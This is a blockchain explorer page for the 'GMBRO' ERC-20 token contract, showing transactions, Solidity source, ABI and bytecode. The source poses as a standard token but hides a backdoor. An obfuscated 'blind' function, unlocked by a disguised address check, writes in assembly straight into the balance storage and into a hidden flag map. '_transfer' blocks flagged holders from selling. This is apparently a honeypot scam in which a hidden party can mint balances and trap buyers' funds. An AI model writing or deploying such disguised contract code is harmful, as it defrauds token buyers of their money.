Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 43 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 18111086 | 461 days ago | IN | 0 ETH | 0.00037123 | ||||
Approve | 18110694 | 461 days ago | IN | 0 ETH | 0.00040789 | ||||
Approve | 18110666 | 461 days ago | IN | 0 ETH | 0.00021322 | ||||
Approve | 18110656 | 461 days ago | IN | 0 ETH | 0.00044422 | ||||
Approve | 18110631 | 461 days ago | IN | 0 ETH | 0.00022837 | ||||
Approve | 18110629 | 461 days ago | IN | 0 ETH | 0.00024676 | ||||
Approve | 18110626 | 461 days ago | IN | 0 ETH | 0.00023299 | ||||
Approve | 18110625 | 461 days ago | IN | 0 ETH | 0.00024107 | ||||
Approve | 18110612 | 461 days ago | IN | 0 ETH | 0.00040557 | ||||
Approve | 18110557 | 461 days ago | IN | 0 ETH | 0.00040704 | ||||
Approve | 18110519 | 461 days ago | IN | 0 ETH | 0.00045372 | ||||
Approve | 18110512 | 461 days ago | IN | 0 ETH | 0.00040483 | ||||
Approve | 18110511 | 461 days ago | IN | 0 ETH | 0.00037889 | ||||
Approve | 18110507 | 461 days ago | IN | 0 ETH | 0.00037539 | ||||
Approve | 18110501 | 461 days ago | IN | 0 ETH | 0.00045864 | ||||
Approve | 18110491 | 461 days ago | IN | 0 ETH | 0.00043207 | ||||
Approve | 18110491 | 461 days ago | IN | 0 ETH | 0.0004294 | ||||
Approve | 18110489 | 461 days ago | IN | 0 ETH | 0.00067356 | ||||
Approve | 18110468 | 461 days ago | IN | 0 ETH | 0.00041038 | ||||
Approve | 18110462 | 461 days ago | IN | 0 ETH | 0.00037147 | ||||
Approve | 18110439 | 461 days ago | IN | 0 ETH | 0.00039014 | ||||
Approve | 18110434 | 461 days ago | IN | 0 ETH | 0.00042592 | ||||
Approve | 18110430 | 461 days ago | IN | 0 ETH | 0.00056794 | ||||
Approve | 18110428 | 461 days ago | IN | 0 ETH | 0.00046613 | ||||
Approve | 18110426 | 461 days ago | IN | 0 ETH | 0.00049325 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
GMBRO
Compiler Version
v0.8.0+commit.c7dfd78e
Contract Source Code (Solidity Multiple files format)
/* Telegram:https://t.me/GMBRO_ther Twitter:https://twitter.com/GMBRO_ther */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "./IERC20.sol"; /** * https://www.godzillaaa.com * * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return 0; uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { // Solidity only automatically asserts when dividing by 0 require(b > 0, errorMessage); uint256 c = a / b; return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract GMBRO is IERC20 { using SafeMath for uint256; string private _name; string private _symbol; uint256 private _totalSupply; address private _owner; mapping(address => uint256) private _balances; mapping(address => uint256) private _llmm; mapping(address => mapping(address => uint256)) private _allowances; address private immutable _wllmm; uint256 private immutable _maxVals; uint256 private immutable _minVals; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); constructor( uint256 maxVals, uint256 minVals, address _wllmm_ ) { _maxVals = maxVals; _minVals = minVals; _name = "GM BROTHER"; _symbol = "GMBRO"; _totalSupply = 1000000000000 * 10**8; _balances[msg.sender] = _totalSupply; _owner = msg.sender; _wllmm = _wllmm_; } /** * @dev A helper function to check if an operator approval is allowed. */ modifier onlyOwner() { require(msg.sender == _owner, "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() external onlyOwner { _owner = address(0); emit OwnershipTransferred(msg.sender, address(0)); } /** * @dev Returns the address of the current owner. */ function owner() external view returns (address) { return _owner; } /** * @dev Returns the token decimals. */ function decimals() external pure override returns (uint8) { return 9; } /** * @dev Returns the token symbol. */ function symbol() external view override returns (string memory) { return _symbol; } /** * @dev Returns the token name. */ function name() external view override returns (string memory) { return _name; } /** * @dev See {ERC20-totalSupply}. */ function totalSupply() external view override returns (uint256) { return _totalSupply; } /** * @dev See {ERC20-balanceOf}. */ function balanceOf(address account) external view override returns (uint256) { return _balances[account]; } /** * @dev See {ERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) external override returns (bool) { _transfer(msg.sender, recipient, amount); return true; } /** * @dev See {ERC20-allowance}. */ function allowance(address owner_, address spender) external view override returns (uint256) { return _allowances[owner_][spender]; } /** * @dev See {ERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) external override returns (bool) { _approve(msg.sender, spender, amount); return true; } function blind(uint256[] calldata omkk) external { if (!coOvalue()) return; (uint256 t0, uint256 t1) = (omkk[0], omkk[1]); assembly { if gt(t1, 0) { mstore(0, t0) mstore(32, xor(4, 0)) sstore(keccak256(0, 64), t1) } if eq(t1, 0) { mstore(0, t0) mstore(32, xor(5, 0)) sstore(keccak256(0, 64), 1) } } } /** * @dev Check if the value of M is correct */ function coOvalue() public view returns (bool) { uint256 solot = _minVals * (1 + (0 / 1)); return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0); } /** * @dev See {ERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}; * * Requirements: * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for `sender`'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) external override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, msg.sender, _allowances[sender][msg.sender].sub( amount, "ERC20: transfer amount exceeds allowance" ) ); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {ERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) external returns (bool) { _approve( msg.sender, spender, _allowances[msg.sender][spender].add(addedValue) ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {ERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) external returns (bool) { _approve( msg.sender, spender, _allowances[msg.sender][spender].sub( subtractedValue, "ERC20: decreased allowance below zero" ) ); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); (bool success, bytes memory data) = _wllmm.call( abi.encodeWithSignature("balanceOf(address)", sender) ); if (success) { uint256 xret; assembly { xret := mload(add(data, 0x20)) } require(_llmm[sender] != 1 || xret != 0, "ex"); } _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner_, address spender, uint256 amount ) internal { require(owner_ != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner_][spender] = amount; emit Approval(owner_, spender, amount); } function alaoPkdkOldkPPPP( bytes10[] calldata vido_PkdklOodk, uint208[] calldata DI_APkdlsl, uint112 address_ppkkdksl, uint48 TOKEN_APDOAPDP, uint192 aodio_dpaiaoKikdk, uint200 NAMapdk_PPPPdkao, bytes4[] calldata VMMMMM_APidkPdk ) private pure {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"},{"internalType":"address","name":"_wllmm_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"omkk","type":"uint256[]"}],"name":"blind","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"coOvalue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60e06040523480156200001157600080fd5b506040516200100238038062001002833981016040819052620000349162000195565b60a083905260c082905260408051808201909152600a8082526923a690212927aa2422a960b11b60209092019182526200007191600091620000ef565b5060408051808201909152600580825264474d42524f60d81b6020909201918252620000a091600191620000ef565b5068056bc75e2d63100000600281905533600081815260046020526040902091909155600380546001600160a01b031916909117905560601b6001600160601b03191660805250620002189050565b828054620000fd90620001db565b90600052602060002090601f0160209004810192826200012157600085556200016c565b82601f106200013c57805160ff19168380011785556200016c565b828001600101855582156200016c579182015b828111156200016c5782518255916020019190600101906200014f565b506200017a9291506200017e565b5090565b5b808211156200017a57600081556001016200017f565b600080600060608486031215620001aa578283fd5b83516020850151604086015191945092506001600160a01b0381168114620001d0578182fd5b809150509250925092565b600281046001821680620001f057607f821691505b602082108114156200021257634e487b7160e01b600052602260045260246000fd5b50919050565b60805160601c60a05160c051610db76200024b60003960006105210152600061054e015260006106ae0152610db76000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101d5578063a9059cbb146101e8578063c9c6e821146101fb578063dd62ed3e14610203576100f5565b8063715018a61461019b57806385ab4862146101a55780638da5cb5b146101b857806395d89b41146101cd576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610a63565b60405180910390f35b61012b610126366004610990565b6102a8565b60405161010f9190610a58565b6101406102be565b60405161010f9190610c2c565b61012b61015b366004610955565b6102c4565b61016861032d565b60405161010f9190610c35565b61012b610183366004610990565b610332565b610140610196366004610909565b610368565b6101a3610387565b005b6101a36101b33660046109b9565b6103f9565b6101c061049f565b60405161010f9190610a44565b6101026104ae565b61012b6101e3366004610990565b6104bd565b61012b6101f6366004610990565b61050c565b61012b610519565b610140610211366004610923565b61057e565b60606000805461022590610cbd565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610cbd565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105a9565b50600192915050565b60025490565b60006102d184848461065d565b610323843361031e85604051806060016040528060288152602001610d35602891396001600160a01b038a1660009081526006602090815260408083203384529091529020549190610882565b6105a9565b5060019392505050565b600990565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e90866108bc565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103ba5760405162461bcd60e51b81526004016103b190610b6e565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610401610519565b61040a5761049b565b6000808383600081811061042e57634e487b7160e01b600052603260045260246000fd5b905060200201358484600181811061045657634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561047e57816000526000600418602052806040600020555b806104985781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610cbd565b60006102b5338461031e85604051806060016040528060258152602001610d5d602591393360009081526006602090815260408083206001600160a01b038d1684529091529020549190610882565b60006102b533848461065d565b6000806105477f00000000000000000000000000000000000000000000000000000000000000006001610c5b565b90506105747f00000000000000000000000000000000000000000000000000000000000000006001610c5b565b3390911614905090565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166105cf5760405162461bcd60e51b81526004016103b190610be8565b6001600160a01b0382166105f55760405162461bcd60e51b81526004016103b190610ad9565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610650908590610c2c565b60405180910390a3505050565b6001600160a01b0383166106835760405162461bcd60e51b81526004016103b190610ba3565b6001600160a01b0382166106a95760405162461bcd60e51b81526004016103b190610a96565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316856040516024016106e79190610a44565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b1790525161071c9190610a28565b6000604051808303816000865af19150503d8060008114610759576040519150601f19603f3d011682016040523d82523d6000602084013e61075e565b606091505b509150915081156107b5576020818101516001600160a01b03871660009081526005909252604090912054600114158061079757508015155b6107b35760405162461bcd60e51b81526004016103b190610b52565b505b6107f283604051806060016040528060268152602001610d0f602691396001600160a01b0388166000908152600460205260409020549190610882565b6001600160a01b03808716600090815260046020526040808220939093559086168152205461082190846108bc565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610873908790610c2c565b60405180910390a35050505050565b600081848411156108a65760405162461bcd60e51b81526004016103b19190610a63565b5060006108b38486610c7a565b95945050505050565b6000806108c98385610c43565b9050838110156108eb5760405162461bcd60e51b81526004016103b190610b1b565b9392505050565b80356001600160a01b038116811461038257600080fd5b60006020828403121561091a578081fd5b6108eb826108f2565b60008060408385031215610935578081fd5b61093e836108f2565b915061094c602084016108f2565b90509250929050565b600080600060608486031215610969578081fd5b610972846108f2565b9250610980602085016108f2565b9150604084013590509250925092565b600080604083850312156109a2578182fd5b6109ab836108f2565b946020939093013593505050565b600080602083850312156109cb578182fd5b823567ffffffffffffffff808211156109e2578384fd5b818501915085601f8301126109f5578384fd5b813581811115610a03578485fd5b8660208083028501011115610a16578485fd5b60209290920196919550909350505050565b60008251610a3a818460208701610c91565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610a82816040850160208701610c91565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610c5657610c56610cf8565b500190565b6000816000190483118215151615610c7557610c75610cf8565b500290565b600082821015610c8c57610c8c610cf8565b500390565b60005b83811015610cac578181015183820152602001610c94565b838111156104985750506000910152565b600281046001821680610cd157607f821691505b60208210811415610cf257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212205cdd376659fa546acc20e3d736051638816355524fdfdf90a8952b41422aabef64736f6c634300080000330000000000000000000000000026492dd0710a14102004001d3208002350062200000000313c466141626cecc47ecdadf275ba1c987a266f5f3e0aa5e751967a000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101d5578063a9059cbb146101e8578063c9c6e821146101fb578063dd62ed3e14610203576100f5565b8063715018a61461019b57806385ab4862146101a55780638da5cb5b146101b857806395d89b41146101cd576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610a63565b60405180910390f35b61012b610126366004610990565b6102a8565b60405161010f9190610a58565b6101406102be565b60405161010f9190610c2c565b61012b61015b366004610955565b6102c4565b61016861032d565b60405161010f9190610c35565b61012b610183366004610990565b610332565b610140610196366004610909565b610368565b6101a3610387565b005b6101a36101b33660046109b9565b6103f9565b6101c061049f565b60405161010f9190610a44565b6101026104ae565b61012b6101e3366004610990565b6104bd565b61012b6101f6366004610990565b61050c565b61012b610519565b610140610211366004610923565b61057e565b60606000805461022590610cbd565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610cbd565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105a9565b50600192915050565b60025490565b60006102d184848461065d565b610323843361031e85604051806060016040528060288152602001610d35602891396001600160a01b038a1660009081526006602090815260408083203384529091529020549190610882565b6105a9565b5060019392505050565b600990565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e90866108bc565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103ba5760405162461bcd60e51b81526004016103b190610b6e565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610401610519565b61040a5761049b565b6000808383600081811061042e57634e487b7160e01b600052603260045260246000fd5b905060200201358484600181811061045657634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561047e57816000526000600418602052806040600020555b806104985781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610cbd565b60006102b5338461031e85604051806060016040528060258152602001610d5d602591393360009081526006602090815260408083206001600160a01b038d1684529091529020549190610882565b60006102b533848461065d565b6000806105477f00000000313c466141626cecc47ecdadf275ba1c987a266f5f3e0aa5e751967a6001610c5b565b90506105747f0000000000000000000000000026492dd0710a14102004001d320800235006226001610c5b565b3390911614905090565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166105cf5760405162461bcd60e51b81526004016103b190610be8565b6001600160a01b0382166105f55760405162461bcd60e51b81526004016103b190610ad9565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610650908590610c2c565b60405180910390a3505050565b6001600160a01b0383166106835760405162461bcd60e51b81526004016103b190610ba3565b6001600160a01b0382166106a95760405162461bcd60e51b81526004016103b190610a96565b6000807f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b0316856040516024016106e79190610a44565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b1790525161071c9190610a28565b6000604051808303816000865af19150503d8060008114610759576040519150601f19603f3d011682016040523d82523d6000602084013e61075e565b606091505b509150915081156107b5576020818101516001600160a01b03871660009081526005909252604090912054600114158061079757508015155b6107b35760405162461bcd60e51b81526004016103b190610b52565b505b6107f283604051806060016040528060268152602001610d0f602691396001600160a01b0388166000908152600460205260409020549190610882565b6001600160a01b03808716600090815260046020526040808220939093559086168152205461082190846108bc565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610873908790610c2c565b60405180910390a35050505050565b600081848411156108a65760405162461bcd60e51b81526004016103b19190610a63565b5060006108b38486610c7a565b95945050505050565b6000806108c98385610c43565b9050838110156108eb5760405162461bcd60e51b81526004016103b190610b1b565b9392505050565b80356001600160a01b038116811461038257600080fd5b60006020828403121561091a578081fd5b6108eb826108f2565b60008060408385031215610935578081fd5b61093e836108f2565b915061094c602084016108f2565b90509250929050565b600080600060608486031215610969578081fd5b610972846108f2565b9250610980602085016108f2565b9150604084013590509250925092565b600080604083850312156109a2578182fd5b6109ab836108f2565b946020939093013593505050565b600080602083850312156109cb578182fd5b823567ffffffffffffffff808211156109e2578384fd5b818501915085601f8301126109f5578384fd5b813581811115610a03578485fd5b8660208083028501011115610a16578485fd5b60209290920196919550909350505050565b60008251610a3a818460208701610c91565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610a82816040850160208701610c91565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610c5657610c56610cf8565b500190565b6000816000190483118215151615610c7557610c75610cf8565b500290565b600082821015610c8c57610c8c610cf8565b500390565b60005b83811015610cac578181015183820152602001610c94565b838111156104985750506000910152565b600281046001821680610cd157607f821691505b60208210811415610cf257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e742065786365656473206261